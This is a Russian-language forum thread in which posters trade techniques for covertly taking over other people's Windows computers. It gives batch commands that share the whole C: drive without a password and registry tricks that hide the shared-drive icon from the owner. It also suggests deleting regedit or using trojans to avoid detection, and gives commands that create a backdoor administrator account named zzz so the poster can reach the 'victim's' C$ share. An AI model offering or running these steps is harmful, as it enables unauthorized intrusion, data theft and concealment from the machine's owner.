Если кинуть батник с содержимым net share disk_c=c: > nul то откроется доступ без пароля и поддержка записи? И после этого как можно убрать значок руки на расшареном диске? Вот нашел по этой теме но ничо не понял: Что делать если народ научился опознавать что их диск отдан в сеть ? Если они это определяют по синей дурацкой руке, то проблемма решается просто, Мелкософт предусматрела такую возможность, когда создается шара, в ее флагах прописывается что-то типа 192 - на R/W или 191 на ReadOnly , однако если у вас выдан в сеть принтак или стоит удаленка, то папка с виндой не держиться ручищщей .. и флаг поэтому у них другой : 302 на запись и 301 на чтение. Младшие 2 бита отвечают за тип доступа, а пятый(или 11 8-\) за видимость значка.Вот и все, просто когда выдаешь ресурс, то флаг должен быть типа 302. Ну а если народ прочухивает дело по реестру, то тут уж помоч могут только трояны, ключ CURRENT_USER не выдаст шару, если в ней прописать ее, опробовано! Но есть еще один способ.. он довольно прямой и наглый, но сработает.. нужно просто стереть программу REGEDIT, либо на время ее запуска подсовывать заранее скопированный реестр.
если тебе так нравятся bat файлы и других идей не было (radmin например) то наверно лучше сделать пользователя своего на чужой машине Code: net user zzz zzz /add net localgroup "Администраторы" zzz /add после чего сможешь от имени пользователя zzz с паролем zzz подключиться к компьютеру жертвы, соответственно C$ и прочее будет доступно.
параметр $ на сколько я знаю, делает шару невидимой в сетевом окружении...А обращаться к ней можно так же как и к обычной шаре \\ip\folder$ Я так в локалке делал...Ещё над правами доступа поработать через cacls и вообще всё шикарно.